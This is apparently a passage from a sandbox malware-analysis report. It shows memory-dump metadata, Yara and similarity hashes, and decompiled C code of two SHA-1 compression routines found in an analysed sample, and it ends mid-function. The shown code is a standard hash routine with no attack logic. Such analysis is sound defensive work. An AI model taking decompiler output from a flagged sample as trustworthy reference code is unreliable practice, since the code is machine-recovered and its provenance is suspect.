                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-3916222277
                                                                                                                                                    • Opcode ID: 61eb376726aa89b944b11d71a37e6421ebd67d68203299846089d692679078d8
                                                                                                                                                    • Instruction ID: f5a2f042bca89bdae33f63e3ba6e03852c8a7c24170844151c9a974160120608
                                                                                                                                                    • Opcode Fuzzy Hash: 61eb376726aa89b944b11d71a37e6421ebd67d68203299846089d692679078d8
                                                                                                                                                    • Instruction Fuzzy Hash: 97A2587290026A9FEF318F54CC81BEAB7B5AB05304F1440EAE55EA3651DB709EC8DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8@8
                                                                                                                                                    • API String ID: 0-222468769
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C5B(void* __eax, void* __ebx, void* __ecx, void* __esi, signed int* _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				char _v304;
                                                                                                                                                    				signed char* _t280;
                                                                                                                                                    				signed int* _t281;
                                                                                                                                                    				signed int _t282;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t291;
                                                                                                                                                    				signed int _t295;
                                                                                                                                                    				signed int _t298;
                                                                                                                                                    				signed int _t302;
                                                                                                                                                    				signed int _t306;
                                                                                                                                                    				signed int _t308;
                                                                                                                                                    				signed int _t314;
                                                                                                                                                    				void* _t316;
                                                                                                                                                    				signed int _t323;
                                                                                                                                                    				signed int _t325;
                                                                                                                                                    				signed int _t328;
                                                                                                                                                    				signed int _t330;
                                                                                                                                                    				signed int _t339;
                                                                                                                                                    				signed int _t345;
                                                                                                                                                    				signed int _t346;
                                                                                                                                                    				signed int _t351;
                                                                                                                                                    				signed int _t361;
                                                                                                                                                    				signed int _t365;
                                                                                                                                                    				signed int _t366;
                                                                                                                                                    				signed int _t370;
                                                                                                                                                    				signed int _t373;
                                                                                                                                                    				signed int _t377;
                                                                                                                                                    				signed int _t378;
                                                                                                                                                    				signed int _t407;
                                                                                                                                                    				signed int _t412;
                                                                                                                                                    				signed int _t418;
                                                                                                                                                    				signed int _t421;
                                                                                                                                                    				signed int _t428;
                                                                                                                                                    				signed int _t431;
                                                                                                                                                    				signed int _t440;
                                                                                                                                                    				signed int _t442;
                                                                                                                                                    				signed int _t445;
                                                                                                                                                    				signed int _t453;
                                                                                                                                                    				signed int _t468;
                                                                                                                                                    				signed int _t471;
                                                                                                                                                    				signed int _t472;
                                                                                                                                                    				signed int _t473;
                                                                                                                                                    				signed int _t479;
                                                                                                                                                    				signed int _t487;
                                                                                                                                                    				signed int _t488;
                                                                                                                                                    				signed int* _t489;
                                                                                                                                                    				signed int* _t492;
                                                                                                                                                    				signed int _t499;
                                                                                                                                                    				signed int _t502;
                                                                                                                                                    				signed int _t507;
                                                                                                                                                    				signed int _t510;
                                                                                                                                                    				signed int _t513;
                                                                                                                                                    				signed int _t516;
                                                                                                                                                    				signed int _t517;
                                                                                                                                                    				signed int _t521;
                                                                                                                                                    				signed int _t533;
                                                                                                                                                    				signed int _t536;
                                                                                                                                                    				signed int _t543;
                                                                                                                                                    				void* _t549;
                                                                                                                                                    				void* _t551;
                                                                                                                                                    
                                                                                                                                                    				_t316 = __ebx + 1;
                                                                                                                                                    				_t549 = _t551;
                                                                                                                                                    				_push(_t316);
                                                                                                                                                    				_t492 = _a4;
                                                                                                                                                    				_t361 = 0;
                                                                                                                                                    				_t3 =  &(_t492[7]); // 0x1b
                                                                                                                                                    				_t280 = _t3;
                                                                                                                                                    				do {
                                                                                                                                                    					 *(_t549 + _t361 * 4 - 0x14c) = ((( *(_t280 - 1) & 0x000000ff) << 0x00000008 |  *_t280 & 0x000000ff) << 0x00000008 | _t280[1] & 0x000000ff) << 0x00000008 | _t280[2] & 0x000000ff;
                                                                                                                                                    					 *(_t549 + _t361 * 4 - 0x148) = (((_t280[3] & 0x000000ff) << 0x00000008 | _t280[4] & 0x000000ff) << 0x00000008 | _t280[5] & 0x000000ff) << 0x00000008 | _t280[6] & 0x000000ff;
                                                                                                                                                    					 *(_t549 + _t361 * 4 - 0x144) = (((_t280[7] & 0x000000ff) << 0x00000008 | _t280[8] & 0x000000ff) << 0x00000008 | _t280[9] & 0x000000ff) << 0x00000008 | _t280[0xa] & 0x000000ff;
                                                                                                                                                    					 *(_t549 + _t361 * 4 - 0x140) = (((_t280[0xb] & 0x000000ff) << 0x00000008 | _t280[0xc] & 0x000000ff) << 0x00000008 | _t280[0xd] & 0x000000ff) << 0x00000008 | _t280[0xe] & 0x000000ff;
                                                                                                                                                    					_t361 = _t361 + 4;
                                                                                                                                                    					_t280 =  &(_t280[0x10]);
                                                                                                                                                    				} while (_t361 < 0x10);
                                                                                                                                                    				_t281 =  &_v304;
                                                                                                                                                    				_v8 = 0x10;
                                                                                                                                                    				do {
                                                                                                                                                    					_t407 =  *(_t281 - 0x18);
                                                                                                                                                    					_t468 =  *(_t281 - 0x14);
                                                                                                                                                    					_t365 =  *(_t281 - 0x20) ^ _t281[5] ^  *_t281 ^ _t407;
                                                                                                                                                    					asm("rol ecx, 1");
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					_t281[9] =  *(_t281 - 0x1c) ^ _t281[6] ^ _t281[1] ^ _t468;
                                                                                                                                                    					_t281[8] = _t365;
                                                                                                                                                    					_t323 = _t281[7] ^  *(_t281 - 0x10) ^ _t281[2];
                                                                                                                                                    					_t281 =  &(_t281[4]);
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					asm("rol edx, 1");
                                                                                                                                                    					_t47 =  &_v8;
                                                                                                                                                    					 *_t47 = _v8 - 1;
                                                                                                                                                    					_t281[6] = _t323 ^ _t407;
                                                                                                                                                    					_t281[7] =  *(_t281 - 0x1c) ^  *(_t281 - 4) ^ _t365 ^ _t468;
                                                                                                                                                    				} while ( *_t47 != 0);
                                                                                                                                                    				_t325 =  *_t492;
                                                                                                                                                    				_t282 = _t492[1];
                                                                                                                                                    				_t366 = _t492[2];
                                                                                                                                                    				_t412 = _t492[3];
                                                                                                                                                    				_v12 = _t325;
                                                                                                                                                    				_v16 = _t492[4];
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol ebx, 0x5");
                                                                                                                                                    					_t471 = _v8;
                                                                                                                                                    					_t499 = _t325 + ( !_t282 & _t412 | _t366 & _t282) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t328 = _v12;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t412;
                                                                                                                                                    					_v12 = _t499;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v8 = _t366;
                                                                                                                                                    					_t418 = _t499 + ( !_t328 & _t366 | _t282 & _t328) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t502 = _t282;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t370 = _v12;
                                                                                                                                                    					_v8 = _t328;
                                                                                                                                                    					_t330 = _v8;
                                                                                                                                                    					_v12 = _t418;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_t288 = _t418 + ( !_t370 & _t502 | _t328 & _t370) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t421 = _v12;
                                                                                                                                                    					_v16 = _t502;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t370;
                                                                                                                                                    					_v12 = _t288;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t330;
                                                                                                                                                    					_t507 = _t288 + ( !_t421 & _t330 | _t370 & _t421) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t366 = _v12;
                                                                                                                                                    					_t291 = _v8;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t421;
                                                                                                                                                    					_v12 = _t507;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t291;
                                                                                                                                                    					_t282 = _v12;
                                                                                                                                                    					_t510 = _t507 + ( !_t366 & _t291 | _t421 & _t366) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                                                                                                    					_t412 = _v8;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t472 = _t471 + 5;
                                                                                                                                                    					_t325 = _t510;
                                                                                                                                                    					_v12 = _t325;
                                                                                                                                                    					_v8 = _t472;
                                                                                                                                                    				} while (_t472 < 0x14);
                                                                                                                                                    				_t473 = 0x14;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_v16 = _t412;
                                                                                                                                                    					_t513 = _t510 + (_t412 ^ _t366 ^ _t282) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t339 = _v12;
                                                                                                                                                    					_v12 = _t513;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t428 = _t513 + (_t366 ^ _t282 ^ _t339) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t516 = _t282;
                                                                                                                                                    					_v16 = _t366;
                                                                                                                                                    					_t373 = _v12;
                                                                                                                                                    					_v12 = _t428;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t295 = _t428 + (_t282 ^ _t339 ^ _t373) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                                                    					_t431 = _v12;
                                                                                                                                                    					_v8 = _t339;
                                                                                                                                                    					_v8 = _t373;
                                                                                                                                                    					_v12 = _t295;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_t473 = _t473 + 5;
                                                                                                                                                    					_t366 = _v12;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_t147 = _t516 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                                                                                                    					_t517 = _t295 + (_t339 ^ _v8 ^ _t431) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x154)) + _t147;
                                                                                                                                                    					_t298 = _v8;
                                                                                                                                                    					_v8 = _t431;
                                                                                                                                                    					_v12 = _t517;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t412 = _v8;
                                                                                                                                                    					_t510 = _t517 + (_t298 ^ _v8 ^ _t366) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x150)) + _t339 + 0x6ed9eba1;
                                                                                                                                                    					_v16 = _t298;
                                                                                                                                                    					_t282 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t510;
                                                                                                                                                    				} while (_t473 < 0x28);
                                                                                                                                                    				_v8 = 0x28;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _t412;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t521 = ((_t366 | _t282) & _t412 | _t366 & _t282) +  *((intOrPtr*)(_t549 + _v8 * 4 - 0x14c)) + _t510 + _v16 - 0x70e44324;
                                                                                                                                                    					_t479 = _v12;
                                                                                                                                                    					_v12 = _t521;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t345 = _v8;
                                                                                                                                                    					asm("ror edi, 0x2");
                                                                                                                                                    					_t440 = ((_t282 | _t479) & _t366 | _t282 & _t479) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x148)) + _t521 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _t366;
                                                                                                                                                    					_t377 = _v12;
                                                                                                                                                    					_v12 = _t440;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v8 = _t282;
                                                                                                                                                    					_t442 = ((_t479 | _t377) & _t282 | _t479 & _t377) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x144)) + _t440 + _v16 - 0x70e44324;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t302 = _v12;
                                                                                                                                                    					_v8 = _t479;
                                                                                                                                                    					_v12 = _t442;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t533 = ((_t377 | _t302) & _t479 | _t377 & _t302) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x140)) + _t442 + _v16 - 0x70e44324;
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t445 = _t377;
                                                                                                                                                    					_t366 = _v12;
                                                                                                                                                    					_v8 = _t445;
                                                                                                                                                    					_v12 = _t533;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_v16 = _v8;
                                                                                                                                                    					_t510 = ((_t302 | _t366) & _t445 | _t302 & _t366) +  *((intOrPtr*)(_t549 + _t345 * 4 - 0x13c)) + _t533 + _v16 - 0x70e44324;
                                                                                                                                                    					_t412 = _t302;
                                                                                                                                                    					_t282 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v12 = _t510;
                                                                                                                                                    					_t346 = _t345 + 5;
                                                                                                                                                    					_v8 = _t346;
                                                                                                                                                    				} while (_t346 < 0x3c);
                                                                                                                                                    				_t487 = 0x3c;
                                                                                                                                                    				_v8 = 0x3c;
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t488 = _v8;
                                                                                                                                                    					asm("ror eax, 0x2");
                                                                                                                                                    					_t536 = (_t412 ^ _t366 ^ _t282) +  *((intOrPtr*)(_t549 + _t487 * 4 - 0x14c)) + _t510 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t351 = _v12;
                                                                                                                                                    					_v16 = _t412;
                                                                                                                                                    					_v12 = _t536;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					asm("ror ebx, 0x2");
                                                                                                                                                    					_t453 = (_t366 ^ _t282 ^ _t351) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x148)) + _t536 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t366;
                                                                                                                                                    					_t378 = _v12;
                                                                                                                                                    					_v12 = _t453;
                                                                                                                                                    					asm("rol edx, 0x5");
                                                                                                                                                    					_v16 = _t282;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_t306 = (_t282 ^ _t351 ^ _t378) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x144)) + _t453 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t412 = _v12;
                                                                                                                                                    					_v12 = _t306;
                                                                                                                                                    					asm("rol eax, 0x5");
                                                                                                                                                    					_v16 = _t351;
                                                                                                                                                    					_t543 = (_t351 ^ _t378 ^ _t412) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x140)) + _t306 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_t308 = _t378;
                                                                                                                                                    					_v8 = _t351;
                                                                                                                                                    					asm("ror edx, 0x2");
                                                                                                                                                    					_v8 = _t378;
                                                                                                                                                    					_t366 = _v12;
                                                                                                                                                    					_v12 = _t543;
                                                                                                                                                    					asm("rol esi, 0x5");
                                                                                                                                                    					_t487 = _t488 + 5;
                                                                                                                                                    					_t510 = (_t308 ^ _t412 ^ _t366) +  *((intOrPtr*)(_t549 + _t488 * 4 - 0x13c)) + _t543 + _v16 - 0x359d3e2a;
                                                                                                                                                    					_v16 = _t308;
                                                                                                                                                    					_t282 = _v12;
                                                                                                                                                    					asm("ror ecx, 0x2");
                                                                                                                                                    					_v8 = _t412;
                                                                                                                                                    					_v12 = _t510;
                                                                                                                                                    					_v8 = _t487;
                                                                                                                                                    				} while (_t487 < 0x50);
                                                                                                                                                    				_t489 = _a4;
                                                                                                                                                    				_t489[2] = _t489[2] + _t366;
                                                                                                                                                    				_t489[3] = _t489[3] + _t412;
                                                                                                                                                    				_t314 = _t489[4] + _v16;
                                                                                                                                                    				 *_t489 =  *_t489 + _t510;
                                                                                                                                                    				_t489[1] = _t489[1] + _t282;
                                                                                                                                                    				_t489[4] = _t314;
                                                                                                                                                    				_t489[0x17] = 0;
                                                                                                                                                    				return _t314;
                                                                                                                                                    			}


































































                                                                                                                                                    0x00408ebb
                                                                                                                                                    0x00408ebe
                                                                                                                                                    0x00408ec5
                                                                                                                                                    0x00408ec8
                                                                                                                                                    0x00408ecb
                                                                                                                                                    0x00408ee0
                                                                                                                                                    0x00408ee7
                                                                                                                                                    0x00408eea
                                                                                                                                                    0x00408eee
                                                                                                                                                    0x00408ef1
                                                                                                                                                    0x00408ef6
                                                                                                                                                    0x00408ef9
                                                                                                                                                    0x00408f08
                                                                                                                                                    0x00408f0b
                                                                                                                                                    0x00408f12
                                                                                                                                                    0x00408f15
                                                                                                                                                    0x00408f18
                                                                                                                                                    0x00408f1b
                                                                                                                                                    0x00408f1e
                                                                                                                                                    0x00408f26
                                                                                                                                                    0x00408f34
                                                                                                                                                    0x00408f37
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f3a
                                                                                                                                                    0x00408f41
                                                                                                                                                    0x00408f44
                                                                                                                                                    0x00408f47
                                                                                                                                                    0x00408f4f
                                                                                                                                                    0x00408f5d
                                                                                                                                                    0x00408f60
                                                                                                                                                    0x00408f67
                                                                                                                                                    0x00408f6a
                                                                                                                                                    0x00408f6d
                                                                                                                                                    0x00408f70
                                                                                                                                                    0x00408f73
                                                                                                                                                    0x00408f7c
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f89
                                                                                                                                                    0x00408fa2
                                                                                                                                                    0x00408fa5
                                                                                                                                                    0x00408fac
                                                                                                                                                    0x00408faf
                                                                                                                                                    0x00408fb2
                                                                                                                                                    0x00408fc4
                                                                                                                                                    0x00408fce
                                                                                                                                                    0x00408fd1
                                                                                                                                                    0x00408fda
                                                                                                                                                    0x00408fdd
                                                                                                                                                    0x00408fe4
                                                                                                                                                    0x00408fe7
                                                                                                                                                    0x00408fed
                                                                                                                                                    0x00409000
                                                                                                                                                    0x00409007
                                                                                                                                                    0x0040900a
                                                                                                                                                    0x0040900d
                                                                                                                                                    0x00409010
                                                                                                                                                    0x00409019
                                                                                                                                                    0x0040901c
                                                                                                                                                    0x0040902f
                                                                                                                                                    0x00409032
                                                                                                                                                    0x0040903c
                                                                                                                                                    0x0040903f
                                                                                                                                                    0x00409041
                                                                                                                                                    0x0040904a
                                                                                                                                                    0x0040904d
                                                                                                                                                    0x00409060
                                                                                                                                                    0x00409066
                                                                                                                                                    0x00409069
                                                                                                                                                    0x00409070
                                                                                                                                                    0x00409072
                                                                                                                                                    0x00409075
                                                                                                                                                    0x00409078
                                                                                                                                                    0x0040907b
                                                                                                                                                    0x0040907e
                                                                                                                                                    0x00409081
                                                                                                                                                    0x0040908a
                                                                                                                                                    0x0040908f
                                                                                                                                                    0x00409092
                                                                                                                                                    0x00409092
                                                                                                                                                    0x004090a5
                                                                                                                                                    0x004090a8
                                                                                                                                                    0x004090ab
                                                                                                                                                    0x004090b2
                                                                                                                                                    0x004090b5
                                                                                                                                                    0x004090b8
                                                                                                                                                    0x004090bb
                                                                                                                                                    0x004090ce
                                                                                                                                                    0x004090d1
                                                                                                                                                    0x004090dc
                                                                                                                                                    0x004090df
                                                                                                                                                    0x004090eb
                                                                                                                                                    0x004090ee
                                                                                                                                                    0x004090f4
                                                                                                                                                    0x004090f7
                                                                                                                                                    0x004090fa
                                                                                                                                                    0x00409101
                                                                                                                                                    0x00409111
                                                                                                                                                    0x00409114
                                                                                                                                                    0x0040911a
                                                                                                                                                    0x0040911d
                                                                                                                                                    0x00409124
                                                                                                                                                    0x00409126
                                                                                                                                                    0x00409129
                                                                                                                                                    0x0040912c
                                                                                                                                                    0x0040912f
                                                                                                                                                    0x00409132
                                                                                                                                                    0x00409139
                                                                                                                                                    0x00409148
                                                                                                                                                    0x0040914b
                                                                                                                                                    0x00409152
                                                                                                                                                    0x00409155
                                                                                                                                                    0x00409158
                                                                                                                                                    0x0040915b
                                                                                                                                                    0x0040915e
                                                                                                                                                    0x00409161
                                                                                                                                                    0x00409164
                                                                                                                                                    0x0040916d
                                                                                                                                                    0x0040917e
                                                                                                                                                    0x00409186
                                                                                                                                                    0x0040918c
                                                                                                                                                    0x0040918f
                                                                                                                                                    0x00409191
                                                                                                                                                    0x00409194
                                                                                                                                                    0x00409197
                                                                                                                                                    0x004091a4

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: 12c64bb4fed4ba15b0d94bc32ec5b981084095cdfb2f0bbc0a7b28738ecc2baf
                                                                                                                                                    • Instruction ID: b73bfbe5203ed15e55806329a11c30ac4546ab7b0022ec9bad2a3cdcb1a6a9fa
                                                                                                                                                    • Opcode Fuzzy Hash: 12c64bb4fed4ba15b0d94bc32ec5b981084095cdfb2f0bbc0a7b28738ecc2baf
                                                                                                                                                    • Instruction Fuzzy Hash: 0E022BB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C60(signed int* _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				char _v304;
                                                                                                                                                    				signed char* _t277;
                                                                                                                                                    				signed int* _t278;
                                                                                                                                                    				signed int _t279;
                                                                                                                                                    				signed int _t285;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t292;
                                                                                                                                                    				signed int _t295;
                                                                                                                                                    				signed int _t299;
                                                                                                                                                    				signed int _t303;
                                                                                                                                                    				signed int _t305;
                                                                                                                                                    				signed int _t311;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				signed int _t320;
                                                                                                                                                    				signed int _t323;
                                                                                                                                                    				signed int _t325;
                                                                                                                                                    				signed int _t334;
                                                                                                                                                    				signed int _t340;
                                                                                                                                                    				signed int _t341;
                                                                                                                                                    				signed int _t346;
                                                                                                                                                    				signed int _t353;
                                                                                                                                                    				signed int _t357;
                                                                                                                                                    				signed int _t358;
                                                                                                                                                    				signed int _t362;
                                                                                                                                                    				signed int _t365;
                                                                                                                                                    				signed int _t369;
                                                                                                                                                    				signed int _t370;
                                                                                                                                                    				signed int _t399;
                                                                                                                                                    				signed int _t404;
                                                                                                                                                    				signed int _t410;
                                                                                                                                                    				signed int _t413;
                                                                                                                                                    				signed int _t420;
                                                                                                                                                    				signed int _t423;
                                                                                                                                                    				signed int _t432;
                                                                                                                                                    				signed int _t434;
                                                                                                                                                    				signed int _t437;
                                                                                                                                                    				signed int _t445;
                                                                                                                                                    				signed int _t459;
                                                                                                                                                    				signed int _t462;
                                                                                                                                                    				signed int _t463;
                                                                                                                                                    				signed int _t464;
                                                                                                                                                    				signed int _t470;
                                                                                                                                                    				signed int _t478;
                                                                                                                                                    				signed int _t479;
                                                                                                                                                    				signed int* _t480;
                                                                                                                                                    				signed int* _t481;
                                                                                                                                                    				signed int _t488;
                                                                                                                                                    				signed int _t491;
                                                                                                                                                    				signed int _t496;
                                                                                                                                                    				signed int _t499;
                                                                                                                                                    				signed int _t502;
                                                                                                                                                    				signed int _t505;
                                                                                                                                                    				signed int _t506;
                                                                                                                                                    				signed int _t510;
                                                                                                                                                    				signed int _t522;
                                                                                                                                                    				signed int _t525;
                                                                                                                                                    				signed int _t532;
                                                                                                                                                    				void* _t536;
                                                                                                                                                    
                                                                                                                                                    				_t481 = _a4;
                                                                                                                                                    				_t353 = 0;
                                                                                                                                                    				_t2 =  &(_t481[7]); // 0x1b
                                                                                                                                                    				_t277 = _t2;
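                                                                                                                                                    				// SHA-1 block load: pack the 64 input bytes into 16 big-endian 32-bit words W[0..15], four words per pass
                                                                                                                                                    				do {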
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                                                                                                    					_t353 = _t353 + 4;
                                                                                                                                                    					_t277 =  &(_t277[0x10]);
                                                                                                                                                    				} while (_t353 < 0x10);
                                                                                                                                                    				_t278 =  &_v304;
                                                                                                                                                    				_v8 = 0x10;
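                                                                                                                                                    				// SHA-1 message schedule: W[t] = ROL1(W[t-3] ^ W[t-8] ^ W[t-14] ^ W[t-16]) for t = 16..79, four words per pass (0x10 passes)
                                                                                                                                                    				do {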
                                                                                                                                                    					_t399 =  *(_t278 - 0x18);
                                                                                                                                                    					_t459 =  *(_t278 - 0x14);
                                                                                                                                                    					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                                                                                                    					asm("rol ecx, 1");
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                                                                                                    					_t278[8] = _t357;
                                                                                                                                                    					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                                                                                                    					_t278 =  &(_t278[4]);
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					asm("rol edx, 1");
                                                                                                                                                    					_t46 =  &_v8;
                                                                                                                                                    					 *_t46 = _v8 - 1;
                                                                                                                                                    					_t278[6] = _t318 ^ _t399;
                                                                                                                                                    					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                                                                                                    				} while ( *_t46 != 0);
                                                                                                                                                    				// Load the five 32-bit chaining values (a..e) from the hash state at _a4[0..4]
                                                                                                                                                    				_t320 =  *_t481;
                                                                                                                                                    				_t279 = _t481[1];
                                                                                                                                                    				_t358 = _t481[2];
                                                                                                                                                    				_t404 = _t481[3];
                                                                                                                                                    				_v12 = _t320;
                                                                                                                                                    				_v16 = _t481[4];
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				// SHA-1 rounds 0-19: f = (b & c) | (~b & d), K = 0x5a827999, unrolled five rounds per pass
                                                                                                                                                    				do {
                                                                                                                                                    					asm("rol ebx, 0x5");
                                                                                                                                                    					_t462 = _v8;
                                                                                                                                                    					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
